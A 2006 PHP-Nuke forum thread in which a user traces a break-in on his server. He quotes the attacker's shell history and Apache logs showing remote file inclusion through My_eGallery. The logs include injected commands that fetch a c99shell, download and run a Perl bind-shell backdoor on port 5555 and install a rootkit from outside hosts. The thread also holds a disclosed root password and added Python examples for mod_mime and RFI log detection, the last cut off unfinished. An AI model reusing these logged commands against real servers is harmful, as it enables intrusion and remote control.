Ravens PHP Scripts: Forums
 

 

marcelolaia (Hangin' Around; Joined: Sep 28, 2005; Posts: 36; Location: Brazil)
Posted: Thu Jun 01, 2006 5:20 am

Hi,

My home server was hacked and I can't find the way used to hack it.

I inspected root's .bash_history and found these:

Quote:
id
[uname -a
uname -a
passwd root
uptime
/sbin/ifconfig
uname -a
cd /tmp
wget [ Only registered users can see links on this board! Get registered or login! ]
lynx -source [ Only registered users can see links on this board! Get registered or login! ] >
psyBNC2.3.2-4.tar.tar
tar -zxvf psyBNC2.3.2-4.tar.tar
cd psybnc
ls
make
makefile
./psybnc
chmod 777 psybnc
cd psybnc[
cd psybnc
cd /tmp
ls
cd psybnc
make;pico psybnc.conf;./psybnc
./psybnc
ls
cd /tmp
ls
rm -vr psyBNC2.3.2-4.tar.tar
rm -vr psybnc
ls
wget [ Only registered users can see links on this board! Get registered or login! ]
lynx -source [ Only registered users can see links on this board! Get registered or login! ] > psybnc.tgz
tar -zxvf psybnc.tgz
cd psybnc
ls
make
pico psybnc.conf
vi psybnc.conf
./psybnc
/sbin/ifconfig
cd /tmp;wget [ Only registered users can see links on this board! Get registered or login! ]
lynx -source [ Only registered users can see links on this board! Get registered or login! ] >
psyBNC2.3.2-4.tar.gz
ls
rm -vr psyBNC2.3.2-4.tar.gz
rm -vr psybnc
ls
rm -vr psybnc.tgz
killall -9 psybnc
ls
ps -aux
killall -9 psybnc
cd /va/tmp
cd /tmp
cd /var/tmp
lynx -source [ Only registered users can see links on this board! Get registered or login! ] >
psyBNC2.3.2-4.tar.gz
/sbin/ifconfig
id
cd /tmp
lynx -source [ Only registered users can see links on this board! Get registered or login! ] > psybnc.tar.tar
tar -zxvf psybnc.tar.tar
cd ...
./run "dev" ./uptime
uname -a
/sbin/ifconfig
ps -aux
killall -9 bindz
killall -9 r0nin


Could anyone help me find the vulnerability???

I use PHP-Nuke 7.4 and my server is Debian stable.

I have the log files in /var/log and I see that the file psyBNC2.3.2-4.tar.gz was created on May 1.

Thank you

_________________
Marcelo [ Only registered users can see links on this board! Get registered or login! ]
The Grad Student's site
Competitive exams, News, CAPES, CNPq, FAPESP, Master's, Doctorate, Professor, Public sector, University, College
kguske (Site Admin; Joined: Jun 04, 2004; Posts: 6432)
Posted: Thu Jun 01, 2006 6:21 am

Sounds like a needle in a very large haystack...

_________________
I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG
 
montego (Site Admin; Joined: Aug 29, 2004; Posts: 9457; Location: Arizona)
Posted: Thu Jun 01, 2006 7:14 am

Doubtful this was hacked because of PHP-Nuke unless you used the same userids and/or passwords in Nuke that you were using to actually log in to the server. This guy somehow got your root password? You have to find out how he/she got user-level access to the server (or was it root access?).

If you do not have to access your server remotely (i.e., you have a keyboard and monitor connected directly), then you may want to disable remote user login. I don't know how to do that, but I know it is possible in most *nix environments.

_________________
Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more... 
VinDSL (Life Cycles Becoming CPU Cycles; Joined: Jul 11, 2004; Posts: 614; Location: Arizona (USA); Admin: NukeCops.com, Disipal Designs, Lenon.com)
Posted: Fri Jun 02, 2006 12:45 am

montego wrote:
Doubtful this was hacked because of PHP-Nuke...
Gotta agree!

I have servers, here at the house -- Slackware boxes -- but none of them have PHP-Nuke installed. And, the other day, I noticed hackers from India had been trying to get into them for the last three weeks. Hahaha! "I pity dah foos!" as Mister-T used to say...

Anyway, this sort of stuff just goes with the turf. I don't recognize a familiar pattern in what was submitted above...

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::. 
VinDSL
Posted: Fri Jun 02, 2006 12:47 am

Um... BTW, if it was me, I'd disable wget and lynx!!! That's just asking for trouble...
 
VinDSL
Posted: Fri Jun 02, 2006 12:58 am

LoL! This gets more interesting, the more I look at it!

As I hinted at above, 'they' used wget and lynx to upload the root kit[s] to your site... Then, away they went...

Make sure your server is recognizing the MIMEs mentioned above, such as:

Code:
AddType application/x-tar .tar

AddType application/x-gzip .gz .tgz
AddType application/x-tar .tgz


...and so forth, and so on!

Also, while you're at it, you might as well take care of RAR, since a LOT of 'script kiddies' are taking advantage of this vuln right now.

This applies to ALL Nuke web sites:

Code:
AddType application/x-rar-compressed .rar


This has snuck under the radar at MANY mass web hosts... mostly 'cause they all use the same canned software, like cPanel/WHM
 
VinDSL
Posted: Fri Jun 02, 2006 1:24 am

Heh! One more post and I'll stop spamming...

Some of you might find this interesting! I posted it the other day on another web site...

==============================

To see if 'your' server is vulnerable to this (ahem) unspecified attack, try the following...

Create a plain text file containing the following code:

Code:
<?php print 'Oops!  If you can read this, your web server is vulnerable to attack!'; ?>

Save and rename it to vindsl.php.rar, then upload it somewhere on 'your' server.

Then, run it in your browser by entering the URL in the browser's addy bar, i.e. [ Only registered users can see links on this board! Get registered or login! ]

If the page shows the message:

Quote:
Oops! If you can read this, your web server is vulnerable to attack!

...you should be alarmed!

If it returns garbled text, or just asks you to download the file, then 'your' web server is probably configured okay and you're not vulnerable. Otherwise, use the fix above...

==============================
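As an added illustration (not VinDSL's code and not from this thread), here is a small Python model of Apache mod_mime's rule for file names with several extensions, run against the vindsl.php.rar test described above. The directive sets are constructed and the handler name php5-script is an assumption; the point it shows is that the .rar AddType line changes the outcome only when PHP itself was enabled with AddType, not when it was enabled with AddHandler.

```python
"""Model of Apache mod_mime's rule for file names with several extensions.

Added example, not code from this thread. The rule modelled (from the
mod_mime documentation): every extension in the name is examined left to
right; for each kind of metadata (content type, handler) the rightmost
extension that defines it wins, and extensions with no mapping are ignored.
The directive sets below are constructed; 'php5-script' is an assumed
handler name."""

from dataclasses import dataclass, field


@dataclass
class MimeConfig:
    """Just the AddType / AddHandler part of an Apache configuration."""
    types: dict = field(default_factory=dict)     # ".ext" -> MIME type
    handlers: dict = field(default_factory=dict)  # ".ext" -> handler name

    def add_type(self, mime_type, *exts):
        for ext in exts:
            self.types[ext.lower()] = mime_type

    def add_handler(self, handler, *exts):
        for ext in exts:
            self.handlers[ext.lower()] = handler


def resolve(config, filename):
    """Return the (content_type, handler) that mod_mime would assign to filename."""
    content_type, handler = None, None
    for part in filename.lower().split(".")[1:]:
        ext = "." + part
        if ext in config.types:
            content_type = config.types[ext]   # a later mapped extension overrides
        if ext in config.handlers:
            handler = config.handlers[ext]     # but type and handler are tracked separately
    return content_type, handler


def php_would_execute(config, filename):
    """True if the request would reach the PHP engine.

    Assumption: PHP runs when a PHP handler is attached, or when the final
    content type is the PHP pseudo-type application/x-httpd-php (the
    AddType way of enabling PHP).
    """
    content_type, handler = resolve(config, filename)
    return handler is not None or content_type == "application/x-httpd-php"


# Setup 1: PHP enabled via AddType, no mapping for .rar.
addtype_only = MimeConfig()
addtype_only.add_type("application/x-httpd-php", ".php")

# Setup 2: same, plus the .rar line recommended in the post above.
addtype_with_rar = MimeConfig()
addtype_with_rar.add_type("application/x-httpd-php", ".php")
addtype_with_rar.add_type("application/x-rar-compressed", ".rar")

# Setup 3: PHP enabled via AddHandler; the .rar type alone does not help.
addhandler_with_rar = MimeConfig()
addhandler_with_rar.add_handler("php5-script", ".php")
addhandler_with_rar.add_type("application/x-rar-compressed", ".rar")

if __name__ == "__main__":
    for label, cfg in [("AddType only", addtype_only),
                       ("AddType + .rar", addtype_with_rar),
                       ("AddHandler + .rar", addhandler_with_rar)]:
        print(f"{label:18} vindsl.php.rar runs as PHP: "
              f"{php_would_execute(cfg, 'vindsl.php.rar')}")
```

On an AddHandler setup the usual Apache remedy is to attach the PHP handler only to names that end in .php, with a FilesMatch "\.php$" block and SetHandler instead of AddHandler.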
 
marcelolaia
Posted: Fri Jun 02, 2006 5:34 am

Dear kguske, montego, VinDSL,

kguske: yes, this is a needle in a very large haystack, for me!

montego:
Quote:
you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server

Yes! I have a general user on my server with the same username and password that I was using in Nuke.

Quote:
This guy somehow got your root password?

Yes, the guy got my root password. My root pass was a very common pass. It was: DP83905AVQB . I suppose that he did a reverse connection with an irq script and gained access to an Apache shell script and did the command "passwd" and changed the root password. In my opinion, he didn't discover my root password.

Quote:
If you do not have to access your server remotely (...), then you may want to disable remote user login

Yes, I have a keyboard, monitor and mouse connected. But my server was in another place, so I needed to connect to it by SSH. But, as I wrote above, I suppose that the guy did a reverse connection!!!! This is the problem: how do I block reverse connections and how do I block access to the Apache shell???

VinDSL
Quote:
I'd disable wget and lynx!!!

Yes, I will uninstall these two applications.

Quote:
Then, away they went...

Yes, I am sure that he went!

Quote:
Make sure your server is recognizing the MIMEs mentioned above, such as:
Code:
AddType application/x-tar .tar

AddType application/x-gzip .gz .tgz
AddType application/x-tar .tgz

(...)
This applies to ALL Nuke web sites:
Code:
AddType application/x-rar-compressed .rar


I am sorry, but what are you suggesting to me?? Where do I find/modify this? In httpd.conf? I am sorry, but my English is very poor!!!

I am very interested, to prevent it and to learn, in how the guy gained access to my shell???

I suppose that he uploaded the rootkit to a dir with write permission in the My eGallery module!!! Then I would like to discover it, or confirm it or not...

Thank you very much
 
montego
Posted: Fri Jun 02, 2006 6:22 am

Quote:
I suppose that he uploaded the rootkit to a dir with write permission in the My eGallery module!!! Then I would like to discover it, or confirm it or not...

The only way to confirm this, I think, is through your Apache logs.

I am glad VinDSL is in on this discussion because he is WAY more knowledgeable about this stuff than I.
 
marcelolaia
Posted: Thu Jun 08, 2006 12:53 pm

Hi Friends,

I found out what the kiddies did on my site:

Here is how:
Quote:
85.107.33.26 - - [28/Apr/2006:20:07:55 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt? HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:07:58 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=home HTTP/1.1" 200 221 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:00 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=forward HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:03 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=up HTTP/1.1" 200 211 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:05 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=search HTTP/1.1" 200 262 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:06 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=back HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:07 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:08 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:14 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a HTTP/1.1" 200 4910 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:17 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:19 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 97 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:23 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:33 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:43 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:46 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:51 -0300] "POST /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F& HTTP/1.1" 200 3152 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

202.143.102.139 - - [28/Apr/2006:21:11:35 -0300] "GET /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:39 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2152 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:54 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2032 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:04 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2081 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2073 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:34 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:42 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:16:05 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2035 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2076 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:23 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:21:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 1966 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:13 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2249 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:46 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2322 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:15 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2282 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2703 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:08 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2117 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:19 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:26:58 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2109 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

201.69.37.104 - - [29/Apr/2006:03:21:18 -0300] "GET /modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2 HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:21:29 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:23:52 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptime HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:23:59 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:24:08 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:24:14 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:24:38 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=uptime HTTP/1.1" 200 8780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:25:24 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/var/tmp;curl%20-o%20ryo.tar.gz%20http://badboybm.100free.com/ryo.tar.gz;tar%20-zxvf%20ryo.tar.gz;cd%20.access.log;./config%20identd%201988;./run;./f*** HTTP/1.1" 200 9021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:25:55 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 8944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


The script that he used is here: [ Only registered users can see links on this board! Get registered or login! ]

Now, what do I do to prevent a new attack???

Could you help me?

I would like to continue using a gallery. Is Menalto the option?

Thank you very much
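An added example, not code from this thread: Python detection logic that scans Apache combined-format log lines for the remote-file-inclusion pattern visible in the excerpt above (a query parameter such as basepath whose value is an absolute URL, sometimes followed by a cmd= parameter) and groups the hits by source address. The sample log lines are constructed, with placeholder IPs and hostnames rather than the real ones from the post.

```python
"""Detect remote-file-inclusion (RFI) attempts in Apache combined logs.

Added example, not code from the forum thread. The pattern is the one in
the excerpt above: a query parameter (basepath) whose value is an absolute
URL, sometimes followed by a cmd= parameter. The sample lines are
constructed; the IPs and hostnames are placeholders."""

import re
from urllib.parse import unquote

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
URL_SCHEME_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample: three inclusion attempts and one ordinary gallery request.
SAMPLE_LOG = """\
198.51.100.7 - - [28/Apr/2006:20:07:55 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/shell.txt? HTTP/1.1" 200 4234 "-" "Mozilla/4.0"
198.51.100.7 - - [28/Apr/2006:20:08:14 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fattacker.example%2Fshell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F HTTP/1.1" 200 4910 "-" "Mozilla/4.0"
203.0.113.9 - - [29/Apr/2006:03:24:14 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0"
192.0.2.44 - - [29/Apr/2006:10:00:01 -0300] "GET /modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(query):
    """Split a raw query string on '&' only and decode each side.

    Deliberately not urllib.parse.parse_qsl: older Pythons also split on
    ';', which would chop up injected shell commands like 'cd /tmp;curl ...'.
    """
    params = []
    for piece in query.split("&"):
        if piece:
            key, _, value = piece.partition("=")
            params.append((unquote(key), unquote(value)))
    return params


def rfi_finding(line):
    """Describe the RFI attempt on this line, or return None for a benign line."""
    rec = parse_line(line)
    if rec is None:
        return None
    # Not urlsplit(): a target like //modules/... would be read as a host name.
    path, _, query = rec["target"].partition("?")
    params = query_params(query)
    remote = [(k, v) for k, v in params if URL_SCHEME_RE.match(v)]
    if not remote:
        return None
    cmds = [v for k, v in params if k == "cmd"]
    return {
        "ip": rec["ip"],
        "time": rec["time"],
        "path": path,
        "param": remote[0][0],
        "included_url": remote[0][1],
        "cmd": cmds[0] if cmds else None,
    }


def scan_log(text):
    """All RFI findings in a log, in file order."""
    return [f for f in map(rfi_finding, text.splitlines()) if f]


def summarize(findings):
    """Per source IP: hit count, remote URLs pulled in, and commands requested."""
    by_ip = {}
    for f in findings:
        entry = by_ip.setdefault(f["ip"], {"count": 0, "urls": set(), "cmds": []})
        entry["count"] += 1
        entry["urls"].add(f["included_url"])
        if f["cmd"]:
            entry["cmds"].append(f["cmd"])
    return by_ip


if __name__ == "__main__":
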